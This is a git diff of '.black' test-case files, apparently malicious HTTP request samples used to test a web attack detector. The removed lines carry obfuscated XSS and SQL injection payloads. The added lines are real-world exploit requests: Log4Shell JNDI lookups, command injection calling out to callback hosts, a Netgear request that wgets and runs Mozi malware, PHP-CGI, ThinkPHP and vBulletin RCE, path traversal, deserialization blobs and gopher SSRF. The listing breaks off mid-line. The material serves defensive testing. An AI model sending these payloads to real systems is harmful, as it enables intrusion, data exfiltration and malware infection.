Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/4b/0a/096825fe5d589a0fe75c44aca53e.black b/testcases/4b/0a/096825fe5d589a0fe75c44aca53e.black index 38456ef72..66d95c9ed 100644 --- a/testcases/4b/0a/096825fe5d589a0fe75c44aca53e.black +++ b/testcases/4b/0a/096825fe5d589a0fe75c44aca53e.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=SELECT+CASE+WHEN+%28YOUR-CONDITION-HERE%29+THEN+TO_CHAR%281%2F0%29+ELSE+NULL+END+FROM+dual&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/4c/17/7df1958bcdf0ea105e4d1f3bcf99.black b/testcases/4c/17/7df1958bcdf0ea105e4d1f3bcf99.black index a2e4eb672..0b38185d7 100644 --- a/testcases/4c/17/7df1958bcdf0ea105e4d1f3bcf99.black +++ b/testcases/4c/17/7df1958bcdf0ea105e4d1f3bcf99.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /admin/?a=doSearchParameter&appno=0+union+select+43512*43017,1--+&c=language_general&editor=cn&n=language&site=admin&word=search HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/4c/76/df11ca5bc3ffc1609e3ffecffcce.black b/testcases/4c/76/df11ca5bc3ffc1609e3ffecffcce.black index 8db2b35f5..b5c81fa56 100644 --- a/testcases/4c/76/df11ca5bc3ffc1609e3ffecffcce.black +++ b/testcases/4c/76/df11ca5bc3ffc1609e3ffecffcce.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=constructor.constructor%28%27alert%281%29%27%29%28%29 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/4f/7f/c352b5295ad70d7c460cb2d1c320.black b/testcases/4f/7f/c352b5295ad70d7c460cb2d1c320.black index c7b9be466..83b85e162 100644 --- a/testcases/4f/7f/c352b5295ad70d7c460cb2d1c320.black +++ b/testcases/4f/7f/c352b5295ad70d7c460cb2d1c320.black @@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /vulnerabilities/xss_r/?name= HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=eyJpZCI6IjEgYW5kIDE9MSJ9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +{"AppId": "aaaa'|curl acs.azlvnac6.xaliyun.com|'", "Time": "2020/1/1 1:1:1"} + diff --git a/testcases/54/f6/bca6cc8a95429592ce2e9bc79fe6.black b/testcases/54/f6/bca6cc8a95429592ce2e9bc79fe6.black index 415017d07..98be81839 100644 --- a/testcases/54/f6/bca6cc8a95429592ce2e9bc79fe6.black +++ b/testcases/54/f6/bca6cc8a95429592ce2e9bc79fe6.black @@ -1,4 +1,4 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /?doAs=%60ping%20acs.14z6oc22.xaliyun.com%60 HTTP/1.1 Host: 10.10.3.128:2280 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 diff --git a/testcases/56/eb/03a4fddffaf7c3958d0700025acb.black b/testcases/56/eb/03a4fddffaf7c3958d0700025acb.black index 4ce16e636..2618da588 100644 --- a/testcases/56/eb/03a4fddffaf7c3958d0700025acb.black +++ b/testcases/56/eb/03a4fddffaf7c3958d0700025acb.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /%0D%0D%0A%0AX-Pen-Test%3Ad0ni8QyNnI HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%27%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%27%5D%28window%5B%27%5Cx64%5Cx6f%5Cx63%5Cx75%5Cx6d%5Cx65%5Cx6e%5Cx74%27%5D%5B%27%5Cx64%5Cx6f%5Cx6d%5Cx61%5Cx69%5Cx6e%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/5b/0d/13f7d5f4c37d750a1e23b19a9cb8.black b/testcases/5b/0d/13f7d5f4c37d750a1e23b19a9cb8.black index 2c57f5b45..d02a69d00 100644 --- a/testcases/5b/0d/13f7d5f4c37d750a1e23b19a9cb8.black +++ b/testcases/5b/0d/13f7d5f4c37d750a1e23b19a9cb8.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.) HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%2Fal%2F.source%2B%2Fert%2F.source%5D%28%2FXSS%2F.source%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/5b/36/bf087c5bf71d51228b4ab5916127.black b/testcases/5b/36/bf087c5bf71d51228b4ab5916127.black index c007a584d..dcd6940a6 100644 --- a/testcases/5b/36/bf087c5bf71d51228b4ab5916127.black +++ b/testcases/5b/36/bf087c5bf71d51228b4ab5916127.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28globalThis%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/62/8b/6fdbc0419d53197dc0c7d336adb3.black b/testcases/62/8b/6fdbc0419d53197dc0c7d336adb3.black index 761549765..f931fe9cd 100644 --- a/testcases/62/8b/6fdbc0419d53197dc0c7d336adb3.black +++ b/testcases/62/8b/6fdbc0419d53197dc0c7d336adb3.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /%24%7Bjndi%3Aldap%3A//127.0.0.1 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%27%5Cx65%5Cx76%5Cx61%5Cx6c%27%5D%28%27globalThis%5B%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22%5D%28globalThis%5B%22%5Cx61%5Cx74%5Cx6f%5Cx62%22%5D%28%22WFNT%22%29%29%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/62/ce/3f16216c912115c6e4c52028f0b2.black b/testcases/62/ce/3f16216c912115c6e4c52028f0b2.black index 467d436da..497d670de 100644 --- a/testcases/62/ce/3f16216c912115c6e4c52028f0b2.black +++ b/testcases/62/ce/3f16216c912115c6e4c52028f0b2.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F+Jump+to+the+codeWorks+in+Chrome+Works+in+Firefox+Works+in+Safari Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/66/18/5ac9a920da0f30620d2b7f74ca95.black b/testcases/66/18/5ac9a920da0f30620d2b7f74ca95.black index 1f1fc4f85..f7bd9726b 100644 --- a/testcases/66/18/5ac9a920da0f30620d2b7f74ca95.black +++ b/testcases/66/18/5ac9a920da0f30620d2b7f74ca95.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /tag_test_action.php?partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md52064567660{/dede:field}&token&url=a HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=this%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28this%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/68/4a/3957912d5632b76f0fedc641a765.black b/testcases/68/4a/3957912d5632b76f0fedc641a765.black index 9f777e32e..79392bf1d 100644 --- a/testcases/68/4a/3957912d5632b76f0fedc641a765.black +++ b/testcases/68/4a/3957912d5632b76f0fedc641a765.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /a?x=%24%7Bjndi%3Adns%3A//%24%7BhostName%7D.hgetinfo.acs.ogru1vfl.xaliyun.com%7D HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/6c/4d/0375d8a186fdf7218486e5815314.black b/testcases/6c/4d/0375d8a186fdf7218486e5815314.black index ad5e16bea..d86e41e5f 100644 --- a/testcases/6c/4d/0375d8a186fdf7218486e5815314.black +++ b/testcases/6c/4d/0375d8a186fdf7218486e5815314.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /index.php/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func&vars%5B0%5D=md5&vars%5B1%5D=20220321 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%2Fal%2F.source%2B%2Fert%2F.source%5D%28%2FXSS%2F.source%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/6e/41/89f52e21c929f13c3f992a6717cf.black b/testcases/6e/41/89f52e21c929f13c3f992a6717cf.black index b835ddb96..bcb1ee545 100644 --- a/testcases/6e/41/89f52e21c929f13c3f992a6717cf.black +++ b/testcases/6e/41/89f52e21c929f13c3f992a6717cf.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /res/login.jsf?javax.faces.ViewState=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHEAfgAFcQB+AAV0AARodHRwcHh0AAdodHRwOi8veA== HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Cbase+target%3D%22alert%281%29%22%3E%3Ca+href%3D%22http%3A%2F%2Fsubdomain1.portswigger-labs.net%2Fxss%2Fxss.php%3Fcontext%3Djs_string_single%26x%3D%2527%3Beval%28name%29%2F%2F%22%3EXSS+via+target+in+base+tag%3C%2Fa%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/6f/cc/cc9e44429863a5c3a0962fb561b1.black b/testcases/6f/cc/cc9e44429863a5c3a0962fb561b1.black index 36f3402aa..df1b09c2f 100644 --- a/testcases/6f/cc/cc9e44429863a5c3a0962fb561b1.black +++ b/testcases/6f/cc/cc9e44429863a5c3a0962fb561b1.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A52%3A%22php+-r+%22echo+md5%28qejifzqgynrucuapeorihgaxlincmnmu%29%3B%22%22%3B%7D HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%27%5D%28frames%5B%27%5Cx64%5Cx6f%5Cx63%5Cx75%5Cx6d%5Cx65%5Cx6e%5Cx74%27%5D%5B%27%5Cx64%5Cx6f%5Cx6d%5Cx61%5Cx69%5Cx6e%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/70/62/5178e5d4b581e1fba17846339f87.black b/testcases/70/62/5178e5d4b581e1fba17846339f87.black index 92da44a49..d8130ee87 100644 --- a/testcases/70/62/5178e5d4b581e1fba17846339f87.black +++ b/testcases/70/62/5178e5d4b581e1fba17846339f87.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?s=%ac%ed%00%05%73%72%00%1a%63%6f%6d%2e%63%74%2e%61%72%61%6c%65%69%69%2e%74%65%73%74%2e%50%65%72%73%6f%6e%00%00%00%00%00%00%00%01%02%00%08%49%00%03%61%61%61%43%00%03%63%63%63%42%00%03%64%64%64%5a%00%03%65%65%65%4a%00%03%66%66%66%46%00%03%67%67%67%44%00%03%68%68%68%4c%00%03%62%62%62%74%00%12%4c%6a%61%76%61%2f%6c%61%6e%67%2f%53%74%72%69%6e%67%3b%78%70%00%00%00%01%00%62%65%01%00%00%00%00%00%00%00%01%3f%80%00%00%40%00%00%00%00%00%00%00%74%00%03%61%61%61 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%27ale%27%2B%27rt%27%5D%28parent%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/75/36/e3b4bc5a5f270b73aa0ae99e1585.black b/testcases/75/36/e3b4bc5a5f270b73aa0ae99e1585.black index 39d6f9809..6dc952e8e 100644 --- a/testcases/75/36/e3b4bc5a5f270b73aa0ae99e1585.black +++ b/testcases/75/36/e3b4bc5a5f270b73aa0ae99e1585.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /error.html?templates[]=1&templateidlist=O:20:%22vB_Image_ImageMagick%22:1:{s:20:%22%00*%00imagefilelocation%22;s:13:%22/path/to/file%22;} HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=this%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/76/4e/a9e66c84f9f5feac22469acb7e99.black b/testcases/76/4e/a9e66c84f9f5feac22469acb7e99.black index bee737b9c..fd23db951 100644 --- a/testcases/76/4e/a9e66c84f9f5feac22469acb7e99.black +++ b/testcases/76/4e/a9e66c84f9f5feac22469acb7e99.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /api/geojson?url=file:///c://windows/win.ini HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Ca+href%3D%22+%09javascript%3Aalert%281%29%22%3EXSS%3C%2Fa%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/76/e2/81a1f4a640ebfd97b990b5b02f5d.black b/testcases/76/e2/81a1f4a640ebfd97b990b5b02f5d.black index aa1810914..63a16c346 100644 --- a/testcases/76/e2/81a1f4a640ebfd97b990b5b02f5d.black +++ b/testcases/76/e2/81a1f4a640ebfd97b990b5b02f5d.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /plugins/servlet/gadgets/makeRequest?url=https://47.104.188.110:7888@acs.qcz84ien.xaliyun.com HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%27ale%27%2B%27rt%27%5D%28window%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/78/49/98be38d971427a7438abfc4b8b39.black b/testcases/78/49/98be38d971427a7438abfc4b8b39.black index 9a7542ab2..2faaf40e0 100644 --- a/testcases/78/49/98be38d971427a7438abfc4b8b39.black +++ b/testcases/78/49/98be38d971427a7438abfc4b8b39.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=toString%28%29.constructor.prototype.charAt%3D%5B%5D.join%3B+%5B1%2C2%5D%7CorderBy%3AtoString%28%29.constructor.fromCharCode%28120%2C61%2C97%2C108%2C101%2C114%2C116%2C40%2C49%2C41%29 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/7a/73/c733cb98cbcf52a3f7a0dd6a55f2.black b/testcases/7a/73/c733cb98cbcf52a3f7a0dd6a55f2.black index d1fa30373..15dc0703e 100644 --- a/testcases/7a/73/c733cb98cbcf52a3f7a0dd6a55f2.black +++ b/testcases/7a/73/c733cb98cbcf52a3f7a0dd6a55f2.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?url=ldap://evil.com:11211/%0astats%0aquit HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+foo+%5B+%3C%21ENTITY+xxe+SYSTEM+%22http%3A%2F%2Finternal.vulnerable-website.com%2F%22%3E+%5D%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/7f/dc/98932ac8e0bef7a96be562836089.black b/testcases/7f/dc/98932ac8e0bef7a96be562836089.black index 94e6fa9bb..7c863d42f 100644 --- a/testcases/7f/dc/98932ac8e0bef7a96be562836089.black +++ b/testcases/7f/dc/98932ac8e0bef7a96be562836089.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET 